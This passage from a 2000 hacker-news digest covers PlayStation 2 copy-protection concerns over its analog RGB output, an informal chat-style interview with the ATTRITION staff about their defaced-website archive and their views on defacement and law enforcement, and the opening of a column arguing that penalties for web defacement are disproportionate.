the company did nothing wrong and that the RGB
interface on the Playstation 2 complies with the DVD
specs.
A company spokesman said Sony installed in
Playstation 2 appropriate means of preventing any
illegal analog-to-analog copying, by providing security
coding from Macrovision for all the system's output
interface signals: RGB, composite, component, and
S-video. For copy protection of analog RGB signals,
Sony worked with Macrovision to add Macrovision
code in RGB's synchronous signals, the Sony
spokesman said.
Further, the game console comes with a cable that
outputs widely used composite video signals. An
optional cable outputs S-video signals and component
signals. In either case, these video signals are protected
by Macrovision technology, and taped images are
therefore of a substantially lower quality than the
originals. That means that nonhackers cannot readily
duplicate DVD video content, the spokesman said.
However, anonymous sources have posted on various
websites the circuitry diagram and the model name of a
converter designed to turn analog RGB signals into
NTSC video signals. This converter is also capable of
inadvertently removing Macrovision code.
Engineering executives at leading DVD hardware
manufacturers, who spoke on the condition of
anonymity, expressed frustration with the situation. They
said the DVD Copy Control Association (DVD CCA),
a licensing agency based in Morgan Hill, Calif., has
prohibited outfitting any DVD player with an analog
RGB output. The only exception is a Scart connector, a
21-pin connector used in Europe that includes RGB
output pins and comes with its own copy protection
measure.
"DVD CCA is aware of the reports about this situation
and we are looking into it," a spokesman for the
association said.
Meanwhile, Sony Computer Entertainment has not
given up its plan to deliver better picture quality for
displaying DVD images through an RGB output. The
company has proposed to the DVD Forum a new cable
specification featuring Sony's proprietary 12-pin
connector at both ends of the cable. This cable directly
conveys analog RGB signal from the Playstation 2
console to a TV set. Sony is currently the only company
selling TVs with a 12-pin input.
So far, it is still unclear how the movie industry will
respond to the Playstation 2 issue. Studio executives
acknowledged this week that protecting against illegal
analog-to-analog copying via analog RGB output has
been a contentious dilemma for studios and the
computer industry. But most studios were hesitant to
complain about Playstation 2.
When the DVD standard was first developed several
years ago, the consumer electronics, movie, and PC
industries all agreed to allow an analog RGB output for
PCs, but none for stand-alone DVD players. According
to sources working closely with the DVD Forum's
Copy Protection Technical Working Group, the three
industries reached that compromise because SVGA
was the only legacy link available to connect a PC
subsystem with an analog PC monitor. If studios ever
wanted to let consumers watch DVD movies on a
computer, this was the only pathway.
Meanwhile, consumer electronics manufacturers agreed
to use composite, component, or S-video -- all
protected by using Macrovision technology -- instead
of an analog RGB output.
Some observers said the fact that different industries got
different treatment from Hollywood could wind up
backfiring. Sony Computer Entertainment, in theory,
could argue that Playstation 2 is not a stand-alone DVD
player, but a computer, experts said. The console
doesn't have a DVD decoder chip, but decodes DVD
in software. Therefore, it could be argued that
Playstation 2 should be permitted an analog RGB
output, like any PC on the market, according to this
camp.
One Hollywood studio executive, commenting
anonymously, said he is not overly concerned with
Playstation 2. In his opinion, the picture quality of
analog-to-analog copying via analog RGB is too weak
to pose a real threat to filmmakers. Others in the movie
industry, however, said Sony may have to solve the
problem before it introduces the new game console in
the United States, where DVD-Video penetration is far
more advanced than in Japan.
Also, Hollywood is giving PCs another look as they
become capable of receiving HDTV broadcasting. An
unprotected analog RGB interface between a computer
and a monitor can allow copyrighted material --
particularly high-definition signals -- to traverse "in the
clear," with no copy protection, becoming a conduit for
mass copying.
One studio executive, who spoke on the condition of
anonymity, said that new ideas on copy protection for
the analog interface are under discussion among PC,
consumer electronics, and movie makers. Companies
such as Hitachi, Intel, Matsushita Sony and Toshiba --
all with a big stake in the issue -- have been working to
find a solution, the executive said. He indicated that an
answer might emerge in the next few weeks.
"Although we have not received any technical
information about this [Playstation 2] issue yet, if the
content is actually being copied from Playstation 2, we
need to discuss [matters] with Sony Computer
Entertainment to take effective measures," said a
spokesman at Sony Picture Entertainment, Tokyo.
@HWA
140.0 HNN:Mar 29th:Interview with Attrition Staff Posted
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by WHiTe VaMPiRe
Project Gamma has recently conducted an interview with the ATTRITION
staff. They detail future plans and speak of how they originally
started, among other things.
Project Gamma
http://www.projectgamma.com/news/interviews/attrition.shtml
----------
sorry about formatting, figured it best left as is. -Ed
ATTRITION
Date Published: March 27, 2000
Date Conducted: March 25, 2000
Interview Conducted By: WHiTe VaMPiRe
Interview Conducted With: ATTRITION
ATTRITION is a leading computer security Web site with dedicated staff. They are probably best known for their defaced Web site archive, as they were among the first to mirror defaced Web sites and provide
them to the public. We came in contact with the ATTRITION staff and asked them about their plans for the future, how they first started, and more.
This interview will be left largely unedited due to the nature of the interview and the amount of people involved. This is to make sure that the original intent of their answers is left intact, without distortion of their
message. Questions will be colored, answers will be indented.
The ATTRITION staff consists of:
cult_hero aka jericho aka Brian Martin
cOmega - Cancer Omega
modify
punkis
McIntyre
munge
<WHiTe_VaMPiRe> What initially brought about the creation of ATTRITION?
<cult_hero> A need for change primarily...
<cult_hero> before attrition was sekurity.org
<cult_hero> sekurity.org had a great concept, but no focus or direction
<cult_hero> dropping it was a way of dropping the lack of direction and let us move on
<cult_hero> attrition wanted to be more to the point
<cult_hero> more honest, more in your face
<cult_hero> no sugarcoating on our words
<cOmega> Definitely in-your-face.
<cult_hero> no pretty eye candy to obscure information
<cOmega> Mostly a meat and potatoes site with little to no window dressing.
<modify> although people still have trouble reading it <grin>
<cult_hero> heh. BLACK AND RED IS HARD TO READ YO
<cOmega> Those come from ppl who don't grok client-side configuration.
<WHiTe_VaMPiRe> Who were the initial people involved with the founding of ATTRITION?
<cult_hero> correct me if i am wrong..
<cOmega> Jericho, Punkis, Modify and myself.
<modify> Meinel, JP, Winn Schwartau, and Atkinson
<cult_hero> but i thought it was punkis/comega/me on irc discussing it.
<cOmega> modify: die die die die
<modify> sorry, had to :)
<cOmega> cult_hero: yeah, there was a flurry of emails between us, to.
<cult_hero> maybe mod was there and lurking ;)
<cult_hero> yes, lots o mail
<cOmega> cult_hero: most likely. ;-)
<cult_hero> in the end, it came down to a list of 10 names
<cult_hero> attrition made the cut
<WHiTe_VaMPiRe> On that note, what made you go with the name ATTRITION (besides the obvious)?
<cult_hero> let me ask you...
<cult_hero> what is the obvious?
<munge> so the CIA -WAS NOT- involved in the founding of Attrition?
<cult_hero> no, the NSA
<cult_hero> oh wait
<munge> ;)
<cult_hero> FBI i mean. yeah, we're their front or something.
<WHiTe_VaMPiRe> Well, the definition, I suppose. As one of you said so appropriately before, "in your face."
<cOmega> IIRC, Jer wanted something serious. I would have been happy with a "go-pound-sand-up-your-ass-with-a-mallet.org" domain.
<cult_hero> attrition literally means "confessing for your sins, but not for the love of god"
<cult_hero> to me that kind of meant confessing for your sins (read: mistakes) because you had a sense of ethics, honor, morality, duty, etc.
<punkis> not that jer has any of that stuff
* punkis snickers
<cOmega> When jer brought the name up, it seemed quite appropriate too, given that the state of security these days is largely a war of attrition.
<WHiTe_VaMPiRe> Thinking about it, my definition of ATTRITION in my own mind was changed as I became more familar with your work.
<cult_hero> vamp: as well as it should...
<cult_hero> attrition means a lot of things
<cult_hero> between a print dictionary, classic literature, dictionary.com etc
* cOmega nods.
<modify> each viewer interprets and uses the site in their own way
<cult_hero> because of that, we were able to kind of form our own hybrid definition i think
<WHiTe_VaMPiRe> How did each of you become involved with ATTRITION?
<McIntyre> Back in March 1997, I had made a fool of myself with the hacker community.
<cOmega> I got involved because I enjoyed working with the system and was willing to pitch in when Jer was quite busy.
<McIntyre> The NCAA Web site was defaced......to make a long story short it was way too easy to track the kiddie down....
<McIntyre> I had never done it before and made a big media whore of myself....
<cult_hero> i got involved because i wanted to carry on what i had been doing for five+ years.. with more focus
<cOmega> Then I started doing more and more stuff...like crashing jer's place about every other weekend.
<McIntyre> then was outted for the fool I was :)
<McIntyre> 2 years later....
<McIntyre> I stumbled across some CPM stuff...was floored...
<McIntyre> I went to Deja.com
<McIntyre> searched for her news postings....and found a doozie.
<munge> i got involved by pitching in on some of the scripting jericho was working on....
<cult_hero> while comega went to sheep.com
<cOmega> Another reason why I got so involved with Attrition was because I work for the US government...and they have NO clue about security.
<cOmega> cult_hero: sheep.gov, mo-ron.
<cult_hero> munge: some? hah, you did 300% more
<McIntyre> CPM admitting she took LSD in the 70's when it was medically legal for "brain damage"...her words :)
<munge> haha cult
<McIntyre> I passed it onto Jer and that, as they say, is the beginning of a beautiful friendship :)
<modify> I've known Jericho since 94
<cOmega> After a long day at the office, coming home to Attrition was a breath of fresh air...validating in its own perverse way.
<modify> he kicked my teeth in and we have been friends since
<punkis> I got involved with attrition because jericho liked my cat
<WHiTe_VaMPiRe> What does ATTRITION mean to each of you personally?
<cult_hero> sometimes i think i could write a book on just that.
<punkis> yup
<punkis> its a love/hate relationship for sure
<modify> dunno...
<cOmega> Attrition to me is not only a clearinghouse of valuable information on security, it also contains a load of information as to the consequences of what happens when people don't take security seriously.
<McIntyre> biting sarcasm, a sharp wit, and forced attrition of those who think they can get away with it
<cult_hero> there is just so much involved with it... so much going on public and behind the scenes (nothing too exciting mind you, conspiracy theoriest of the world k39383)
<cOmega> We're known largely for our mirror, but that's less than 50% of what we're all about.
<punkis> plus its a lot more cO
<punkis> music reviews, sushi reviews, wine reviews
<cOmega> The mirror shows the consequences; the rest of the Attrition site shows how one can be proactive about security.
<cOmega> punkis: true.
<cOmega> and calamari
<munge> it's about the calamari, dammit
<cOmega> Calamari is next to godliness.
<punkis> yes
<punkis> yes it is
<modify> To be honest I've found good friends at Attrition.. beyond the obvious I have found family there
<punkis> and there is a roy's right by work
<cOmega> punkis: oh yes.
<modify> Sushi King rules... I'd like to plug them
<modify> errr... not in that way though
<modify> :)
<cOmega> modify: there's a picture I didn't need.
<cOmega> Basically, we're all a bunch of sick little monkeys who happen to think alike and we share our various passions in life through this 24-hour megaphone of technology known as attrition.org
<WHiTe_VaMPiRe> What do you have planned for ATTRITION's future?
<punkis> personally I want to see a technical focus on attrition
<cult_hero> attritions future. mostly continuing what we have done and making it better. more access to the information, better stats, better cross ref
<cult_hero> we have been planning a lot more tech areas
<munge> *nod*
<cult_hero> which punkis will be heading up soon i think
<cOmega> punkis: agreed; more of a focus on technical papers and all that good stuff.
<cult_hero> you can expect to see the return of errata
<punkis> yes
<modify> Im thinkin of giving up my Attrition account to join the ranks of the Happy Hacker Grey hat slappy foundation...
<cOmega> cult_hero: rad.
<modify> yes, would like to focus more on technical projects
<WHiTe_VaMPiRe> Errata, in what sense?
<cult_hero> the errata section that deals with shoddy journalism on the net and in print
<cult_hero> www.attrition.org/errata/
<cOmega> modify: w00t
<cult_hero> it actually was one of our earlier widely recognized pages
<WHiTe_VaMPiRe> Ah, right. Negation came to mind as part of that.
<cult_hero> lead to a lot of attention and validation of who we were.
<cOmega> God knows there's enough errata out there.
<cult_hero> errata linked to negation
<cult_hero> yes
<WHiTe_VaMPiRe> The technical projects, what do you have planned in that regard?
<modify> I would like to see more technical documents and programs released by Attrition and its Staff
<punkis> I have some ideas for some security related tools I want to put together
<punkis> and a couple of real interesting research ideas
<cOmega> I'm working on a full PGP guide that will walk users through the command line and gui versions; installation and usage, as well as caveats.
<cOmega> I also have a big-ass proposal I'm working on and will be hopefully releasing under the attrition banner.
<cOmega> I'm leaving my government job.
<WHiTe_VaMPiRe> Are there any common misconceptions behind ATTRITION that you would like to clear up?
<cult_hero> YES
<cOmega> YES
<cult_hero> 1. we are not a company
<punkis> HELL YES
<cult_hero> 2. we do not profit from attrition
<cult_hero> 3. we are not an FBI front
<cOmega> 1. We are not a Hacker Gang.
<cOmega> 2. We are not LE.
<punkis> 4. mcintyr5e is really a woman
<cult_hero> 4. we are not affiliated with the FBI, CIA, ISA, NSA, DOD, etc
<modify> 6. We never worked for FEMA
<cOmega> 3. We are NOT "out to get anyone" - we just tell the truth, unpretty as it is.
<cult_hero> 5. we are not HFG, ULG, GH, or any other kiddy defacer group
<munge> but, cult, we do meet in giant bunker shaped like a pentagram
<cOmega> 4. Punkis is really a man.
<punkis> 6. Yes, we really do have a helicoptor
<McIntyre> 7. Modify is really a cat.
<modify> 7. Meinel and JP lie 100% of the time
<cOmega> 5. We have guns, but we don't have any machine guns.
<modify> 10. Loop 1
<cult_hero> 10 goto 1
<cOmega> 6. We are NOT into vampirism or bloodletting (unless there is sex involved)
<cult_hero> i do not work for KPMG
<cult_hero> i was not fired from any security job
<cult_hero> i am not an fbi informant
<cOmega> I do work for NASA
<modify> 11. I need a woman so if any single, attractive women are out there then....
<cOmega> I am leaving NASA for a better job.
<cult_hero> attrition has fufilled 2 federal subpoenas in accordance with US Law
<cOmega> (I know those fuckwits will lie and say I was 'fired' or some shit.)
<WHiTe_VaMPiRe> When did ATTRITION initially start the defaced Web site archive?
<cOmega> Actually, defacement mirroring started before attrition.
<cOmega> It became "institutionalized" under attrition.
<cult_hero> comega started it long ago
<cult_hero> back when it was an uncommon occurance
<cOmega> I was doing it way back in the sek.org days.
<cOmega> I mirrored only sites that I thought were entertaining or elegant in some way.
<modify> Craig Whitmore started it
<cOmega> My favorite of all time is "That 0wned Girl".
<WHiTe_VaMPiRe> So ATTRITION's mirror was actually a continuation of a project initially started by cOmega?
<punkis> yes
<cOmega> In a manner of speaking. Jer took the idea and pumped it full of steroids.
<cult_hero> yes
<McIntyre> When I joined up in Fed 1999......I went around to other dead mirrors and asked if we could archive their material
<cult_hero> 001. comega's mirror of elegant hacks
<cult_hero> 002. collection of other mirrors
<cult_hero> 003. start to mirror new sites
<cult_hero> 004. begin to refine process
<cult_hero> 005. begin to automate the mirror process
<cult_hero> 006. revamp the mirror
<cult_hero> 007. further refine mirror, automatino, etc.
<cOmega> cult_hero: we got to port the mirror into a db.
<cOmega> mSQL or similar
<cult_hero> 008. begin to take a more active stance in awareness and statistics
<cult_hero> that is kind of the progression
<cult_hero> that is a future goal of the mirror
<cult_hero> DB it, and make it more searchable
* cOmega nods.
<cult_hero> more stats
<cult_hero> Munge is working on some killer graphical stats pages regarding defacements
<cult_hero> these will be the kind that make CERT look bad
<cult_hero> it will put CSI/FBI to shame
<cult_hero> let me rant a sec
<cult_hero> one thing we have going for us about the mirror..
<cult_hero> is that people report the incidents to us
<cult_hero> not just the hackers
<cult_hero> but admins sometimes
<cult_hero> because of this, we can generate a lot more comprehensive stats than the FBI/CERT does
<cult_hero> because people see reporting to them as a waste of time
<cult_hero> their lack of response and action discourages further reporting
<cOmega> The FBI only investigates cases involving mondo $$ or mondo politics.
<cult_hero> because of this, we hope to take their place in providing realistic statistics regarding computer intrusion
<modify> One clarification here though everybody
<modify> and everybody reading this
<cult_hero> fbi unofficial amount is 5k
<modify> WE DO NOT HACK THE SITES THAT APPEAR ON THE MIRROR
<cult_hero> heh
<punkis> thank you mod
<cOmega> And our work has one great benefit: we don't do this to pump up our budget or increase revenue (unlike the .com's and .govs)
<cult_hero> amen
<cOmega> we do it because we are passionate about it.
<modify> so stop accusing us ya lackwits
<cult_hero> and as we have said, we have all turned down consulting work from the mirror
<cOmega> modify: werd to that.
<McIntyre> and we continue to do so
<cult_hero> as much as we hate to do it (and admit it), we've lost some great consulting gigs
<cult_hero> if we did this for indirect money, i think it would somewhat invalidate our purpose and reason
<cOmega> Agreed.
<cOmega> Oh yes, one more thing.
<modify> yah, but maybe I should get the arts and crafts store to provide financial backing?
<cOmega> Please ask the kiddies to stop asking us 1. how to hack, or 2. how they can break the law in fucking with their ex or stupid shit like that.
<WHiTe_VaMPiRe> The next question was, "What is your reasoning behind the defaced Web site archive?" .. but I believe you already answered that.
<cult_hero> lemme clarify something
<cult_hero> people like to say that we encourage kids by providing the mirror
<cult_hero> as punkis always mentions, does this means the news agencies are guilty of encouraging murder?
<cult_hero> they write about it, live around it, film it, feed it to the masses
<cOmega> Like I said earlier, the mirror shows what the consequences are if someone doesn't take security seriously...and website defacements are the LEAST menacing consequence. Consider the intruder who
alters your data or silently swipes a credit card databse (unlike Curador). Now *that* is scary.
<cult_hero> 1. if we don't do it, someone else will.
<cult_hero> 2. with us doing it, we think we can do it with a lot of integrity and milk it for valuable info in the form of stats and comparisons
<McIntyre> So....we might as well do it fully and completely
<cult_hero> 3. we berate the shit out of the kids reporting these sometimes. we call them lame script kiddies for their actions.
<cult_hero> 3.5 we do NOT condone their activity any more than shrinks condone the behaviour of their clients
<cOmega> no doubt
<WHiTe_VaMPiRe> What are your personal feelings on Web site defacements?
<cOmega> Lame.
<punkis> I think they are fucking lame
<modify> stupid
<punkis> such as is tagging
<cOmega> There is no elegance in it these days.
<modify> no purpose
<punkis> same thing
<cOmega> Just greets and swearing.
<cult_hero> 99.9% are a waste of time, talent, and purpose
<punkis> 99.9% require no tallent
<cult_hero> nod
<modify> any reason to hack amnesty international?
<cOmega> At least the "That 0wned Girl" defacement was funny.
<modify> no
<McIntyre> At least those done for hacktivism had a reason.....
<modify> yah, that rooled
<munge> who reads the mirror archive just to see the defacements anymore? not me. 'nuff said.
<cOmega> Some other hacks that I mirrored early on were funny as hell.
<cult_hero> if we don't mirror them, they will continue to happen tho
<punkis> and when they defaced KKK it was fucking stupid....no message
<cult_hero> the URLs will be passed around IRC and mail lists
<McIntyre> I've seen maybe 5-6 good ones since I started last February.....
<McIntyre> 1999
<WHiTe_VaMPiRe> 'Hacktivism' these days is a shroud / justification for lacking actions, quite frequently, from what I have seen.
<cult_hero> so we mirror them despite their lame message
<munge> *nod*
<McIntyre> all the rest are just plain wasteful.
<punkis> hactivism is a myth
<modify> its a freakin excuse
<cOmega> WHiTe_VaMPiRe: Given what I've seen, hactivism is a myth.
<modify> lets face it
* cOmega hi5's punkis.
<McIntyre> Don't fucking hack a site because you can.
<cult_hero> i think i have found a way to identify hacktivism. no signature. if you are hacking for a reason, there is no need to put a name, group name, or greets.
<cOmega> It's like this: if you have a beef with, say, Big Oil, would you picket a Mom & Pop dime store?
<cult_hero> those that do so are using it as a justification, not for pure hacktivism
<cOmega> That's what these kiddies are doing when they hit 'smalltime.com' and bitch about 'big government'.
<modify> I hacked it for freedom of speech or freedom of information is a crock of shit too...
<McIntyre> cOmega...exactally.
<cult_hero> like the Japanese servers defaced today to rant (in english) about Pakistan/Indian issues
<McIntyre> If you have a message. Deface a site that has something to do with that message (not that we condone it...)
<cOmega> It's like when H4G1S hit NASA HQ.
<cOmega> They bitched about commercialization of the Internet.
<cOmega> Uhhh...DUH? Then why not hit a .com, ya sutpid fucks?
<munge> if hackers want to have an impact, then they should donate their time and skills to causes they believe in.
<WHiTe_VaMPiRe> From what you have seen, what are the common motives for Web site defacement?
<McIntyre> 1. Because they can
<cOmega> WHiTe_VaMPiRe: juvenile angst.
<cult_hero> motive is because they can
<punkis> yes I agree with mcintyre
<McIntyre> 2. To make fun of another group/rile them up
<cult_hero> and because they think 'hacking' is sexy
<McIntyre> 3. to test their skills
<cult_hero> "everyone else does, it must be what hacking is about, so i will do it so i can be a hacker"
<McIntyre> 4. to show off
<cult_hero> circular logic
<cOmega> WHiTe_VaMPiRe: why do young kids go hot rodding? It's a rush and it makes them feel big.
<punkis> defacing a web site != hacking
<munge> donate time to green peace, something like that. don't deface a corporate website
<cOmega> punkis: word.
<modify> stop at #1 and loop
<munge> *nod* punkis
<McIntyre> 5. to get their message out regardless of what site they deface
<cOmega> Doing a ./latest-sploit.sh != hacking
<cOmega> And the only thing lamer than defacements is DoS'ing.
<McIntyre> 6. being the first to deface a new country....
<McIntyre> 7. being the first to deface an new OS
<McIntyre> (ie Win2k)
<modify> yah, and running UNIX exploits against an NT server isn't gonna work... thats TIP #1
<cult_hero> defacing a "secure" company
<cOmega> hahahha
<punkis> and iishack is not effective against apache
<munge> haha
<modify> lol
<cult_hero> or the morons who tried to hit us with IIS exploits the other night
<WHiTe_VaMPiRe> hahah
<WHiTe_VaMPiRe> Nice.
<McIntyre> I bet it won't be long before someone tries to deface a Palistine site (.ps) when they go live.
<cOmega> Remind me to show you my logs at work sometime. Not a lot of brain thrust out there.
<WHiTe_VaMPiRe> Do you feel that there is any valid motive for defacing a Web site?
<cult_hero> good question
<cult_hero> valid MOTIVE? sure
<cult_hero> strictly speaking of motives, i think so
<WHiTe_VaMPiRe> valid reasoning, I should say..
<modify> women only.. just od it for women
<cult_hero> true hacktivism. david vs goliath (angry consumer vs large corp)
<punkis> its just a shame no valid motives are never demonstrated
<modify> like Zyklon
<cult_hero> exactly
<cult_hero> mod: that is called obsessive stalking i think
<punkis> like I said, KKK was defaced, which I have no problem with, but there was no message
<modify> whats wrong with that
<modify> ?
<cOmega> I can see doing it as a prank between friends, but as an actual intrusion with intent to damage someone else's property, I couldn't go with that. Minor exceptions would be made for hate groups and/or
pedophiles.
<cOmega> But that's on principle alone.
<cOmega> I think defacements generally denigrate the intent of doing good.
<punkis> especially when these fuckwits are defacing schools that really have no admin/security personel to speak of
<punkis> they are helpless
<munge> i could see doing it in a completely oppressive society, with no outlet for free speach, against that oppressive gov't
<modify> nod lik k12 doms
<modify> WE DO NOT ENDORSE DEFACEMENT OF SITES... WE JUST ARCHIVE!!!
<modify> message #2
<cult_hero> </disclaimer>
<modify> sorry just clearing up FAQ's
<WHiTe_VaMPiRe> Do you have any comments on the legal implications of computer crime?
<cOmega> WHiTe_VaMPiRe: legal implications?
<cult_hero> can you be more detailed?
<cOmega> explain.
<WHiTe_VaMPiRe> The current law enforcement response to say, Web site defacement, and other forms of computer crime that are starting to become more prominant.
<cOmega> I personally believe the idea of increasing penalties for hacking is utterly wrong-headed.
<cult_hero> another book in the making
<punkis> yes
<munge> cOmega: *agreed*
<cOmega> Security is not rocket science.
<modify> Poor admins are too easy to point fingers..
<cOmega> If the government would focus more on the ounce of prevention rather than the pound of cure, we would have have 1/10th of 1% of the number of intrusions we have today.
<modify> ITS YOUR JOB@!!!!
<modify> stop surfing porn
<cOmega> modify: right on.
<munge> haha maud
<cult_hero> As my mother said, it is a knee-jerk reaction you find made by law enforcement to ANY 'new' type of crime
<punkis> well put
<cOmega> the media doesn't help matters, either.
<cOmega> it puts for the proposition that these scriptkiddies are 'geniuses' because it's a sexy story.
<punkis> the media is the driving force behind the governments reaction
<cOmega> it's not sexy enough to say that the admins are lazy bums and that everyone and theire brother who had a clue knew about the vulnerability 2 years ago.
<WHiTe_VaMPiRe> What response do you feel would be most appropriate from law enforcement?
<cOmega> I expect nothing appropriate from law enforcement.
<cult_hero> "you were broken into because you are stupid. secure your machines"
<cOmega> The legislature is the only branch that can change it.
<McIntyre> Taking the time to learn the technology they're dealing with
<modify> Kick every door in until you find the culprit :)
<McIntyre> rather than working against it
<cOmega> LE is just a group of droids who follow orders.
<cult_hero> i think most web site investigations are a waste of tax payer money
<punkis> like mod said, so your fucking job
<cOmega> cult_hero: agreed++
<punkis> s/so/do
<modify> Admins need to take more time to look at the security of their network
<modify> its not freakin hard
<punkis> some of the mail we get from cluless admins really floors me
<WHiTe_VaMPiRe> As more laws are being passed as of late, and others trying to be passed, what do you think is the best response? More laws, less laws? What type of laws? What do you feel the
overall best response to computer crime and punishment would be?
<cult_hero> The same laws. The laws are NOT the problem.
<cOmega> WHiTe_VaMPiRe: I'll tell you this: out of 2,000 admins at one NASA center, I can count on one hand the number who actually understand how to lock down a server. And
people wonder why NASA gets breached so often!
<modify> Security awareness...
<cult_hero> I think the FBI need to stand back and qualify what is worth investigating.
<cOmega> WHiTe_VaMPiRe: I think the next law that gets passed should be one that set a mandatory limit on what qualifies someone to be an admin.
<punkis> a large media response is not a good justification for an investigation
<cult_hero> They are being jerked in every direction by bureacracy, charlatan consultants claiming to have miracle solutions, media pressure, and more
<cult_hero> how can they be expected to do a good job when they have no understanding of the security arena?
<cOmega> The proposal I'm working on should eradicate a lot of charlatans and snakeoil in the industry.
<modify> I love the admins that throw up a NT server and leave it... kinda like leaving your car running while going to the store
<McIntyre> Why concentrate on a Web defacement where nothing was deleted, yet ignore the constant intrustions into gov servers by machines in foreign countries
<cult_hero> Think the FBi would have busted Curador had there been no media attention?
<cult_hero> hell no.
<cOmega> cult_hero: curador also wiggled his ass at them, which was not a bright thing to do.
<cOmega> curador bragged too much.
<cult_hero> without the media attention, they never would have seen such ass wiggling
<punkis> heh
<cOmega> true
<McIntyre> Although, I have to admit....there was less attention on Curador than there was with Max Stone and the DDoSers
<cOmega> What got Curador was that he used the stuff he stole.
<cOmega> Which was not too terribly bright.
<modify> oh.. new buzzword bingo will be "Zombie Attacks" look for it at a theatre near you!
<cult_hero> fraud bumped it into a new level of crime
<McIntyre> that and he kept moving from place to place leaving a new trail to add to the investigation each time.
<cOmega> I think the other half of that criminal investigation should be the sites that left CC data on the server unencrypted.
<cult_hero> all free servers, which log heavily
<cOmega> I'd like to stay with that for a moment.
<cOmega> You see, a lot of our rights are under attack by our own government.
<cOmega> Our right to explore (ala restrictions on reverse engineering)
<cOmega> Our right to possess firearms
<cOmega> Our right against unreasonable search and seizure (see the drug laws)
<cOmega> Did you know that if you carry around more than 500 dollars on your person and a cop sees it, that money can be legally taken from you WIHTOUT your being arrested or
charged??
<cOmega> And you have to PROVE you have it legally.
<cOmega> I kid you not.
<cOmega> It's part of the zero tolerance anti-drug laws.
<cOmega> look it up.
<cOmega> I -- right now -- am a Fourth Amendment nightmare waiting to happen.
<cOmega> I plan to rant on it via attrition in the future.
<cOmega> Guns are my primary passion. To me, the 2nd Amendment is as crucial as the First Amendment (which is what Attrition is all about).
<WHiTe_VaMPiRe> As the defaced Web site archive seems to be the area most focused on within ATTRITION these days, what section do you feel is most overlooked, or does not get as much attention as it deserves?
<munge> calamari
<cult_hero> errata and our various tech areas
<McIntyre> vulnerabilities
<cult_hero> staff.html ;)
<modify> Newbie
<punkis> haha
<cOmega> Firearms.
<munge> more seriously, 1. the stats
<WHiTe_VaMPiRe> I cannot end this interview without asking this thought provoking and vital question running through everyone's mind.. do you guys like Ramen (noodles)?
<McIntyre> Always room for Ramen
<cult_hero> i dig ramen.
<modify> with butter
<cult_hero> not as much as calamari, sushi or mississippi mud tho
<munge> Ramen: Yes.
<cOmega> I don't eat Ramen...but Satrina does. I eat Popcorn.
<modify> sushi
<cOmega> Filet Mignon.
<munge> yes, sushi is the best
<cult_hero> hmmm
<modify> sushi
<cult_hero> enough of that
<cOmega> hehehe
<McIntyre> Whiskey Sours, Mudslides, General Gau Chicken, and Nigiri
<modify> there is this place Sushi King
<WHiTe_VaMPiRe> Okay, okay, what 'geek' does not like Ramen. Answer this, what kind of Ramen do you prefer?
<cOmega> COFFEE.
<modify> its a great place for the gender benders
<modify> like jericho
<cult_hero> I dig the Cup o Soup honestly.
<munge> i like the chili ramen :)
<cOmega> I eat Habanero chilis and popcorn. I was born before Ramen came into existence.
<WHiTe_VaMPiRe> Anything you would like to discuss or any closing comments before we end this interview?
<cOmega> One thing I'd like to add.
<cult_hero> if something isn't covered here...
<cult_hero> just mail and ask
<WHiTe_VaMPiRe> Okay, will do.
<WHiTe_VaMPiRe> Thanks a lot for the time.
<cOmega> We are a proactive group. We are also very *pro* on things like accuracy, truth and fairness.
<cult_hero> not just you vamp, all the interview readers too.
<cOmega> This does not mean we are against anyone.
<cOmega> We are only against those people who do not practice accuracy, truth or fairness.
<cOmega> It's a matter of principles, not personalities.
<cOmega> And don't let anyone tell you different.
ATTRITION is reachable at http://www.attrition.org/. You can find more information about the staff on this Web page or mail them.
@HWA
141.0 HNN:Mar 29th:The Unfairness of Computer Crime Sentences
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
From HNN http://www.hackernews.com/
contributed by Agrajag
Are the punishments given to those who commit relatively minor
computer-related crimes, such as web page defacements unfair? Rather
than being treated like their real-world counterparts (eg: trespass
and spray-painting graffiti), and earning the fairly minor sentences
that fit the actual crimes, they are most often instead treated as
serious felonies deserving of overly harsh punishments, which are
simply completely out of line with the crimes committed, and are
seemingly only given just because a computer was involved.
Linux World
http://www.linuxworld.com/linuxworld/lw-2000-03/lw-03-devnul_3.html
----------
A matter of degrees: Let the punishment fit the crime.
Summary When Attorney General Janet Reno's report, "The Electronic
Frontier: The Challenge of Unlawful Conduct on the Internet," was
published earlier this month, it drew the conclusion that "existing
federal law is generally adequate to cover unlawful conduct involving
the use of the Internet." J.S. Kelly rather vehemently disagrees with
that finding. (2,000 words)
By J.S. Kelly
US attorney general's report, entitled "The Electronic Frontier: The
Challenge of Unlawful Conduct on the Internet," repeatedly emphasized a
need to treat unlawful conduct online the same as it is treated
offline.
At least two glaring examples of how cyber issues are handled differently
than their counterpart issues in the non-Internet world were not included
in the report. One of those issues is that car manufacturers, unlike
software companies, are held liable for selling products they know are
defective. I'd like to address that well known shortcoming in a future
column, devoting this one to an issue that's even more important.
Free Coolio In the first week of March, at about the same time the report
was published, news sources reported that a 17-year-old New Hampshire kid,
who goes by the online name Coolio, had been detained as a suspect in a
hacking case.
The teen told reporters that he had defaced three Web sites, of which two
were US government sites. But they weren't exactly the equivalent of the
Pentagon -- D.A.R.E. is the Los Angeles Police Department's antidrug
Website for kids, and the CWC is the relatively unknown and unimportant
Chemical Weapons Convention Webpage. The site hosts informational texts
relating to the CWC, a global treaty that bans chemical weapons.
The third supposed hack (a hijacking, actually) attributed to Coolio is
that of RSA, a commercial computer security company.
Website defacement is being described by US authorities as felony
vandalism, while in Canada the same phenomenon seems to be called malicious
mischief to data.
Let he who is without youthful indiscretions cast the first stone The
media, with visions of Pulitzer prizes dancing in their heads, have pursued
this story with due diligence and vigor.
News reports described the teen in ominous tones, as "a high school
dropout" who "regularly gets high on cough syrup," who is supposedly
emotionally unstable because he is liable to fly off the handle when
criticized, and whose room is "almost too messy to enter."
Give me a break -- the kid is 17 years old. If they'd found a 17-year-old
with a really neat room, who was ostensibly not prey to the emotional ups
and downs usually associated with adolescence, then I might be a little
more worried. I'd prefer that he experimented with cough syrup and
mouthwash than with heroin. And he was not a dropout: he left school early
and got his GED.
Now, you might argue that to break into computers and to deface US
government Websites is, well, kind of dumb. I don't disagree. But
adolescence is dumb, too.
Adolescence is all about testing limits, standing up to authority (and
rejecting it) and generally behaving like an idiot. It's also about
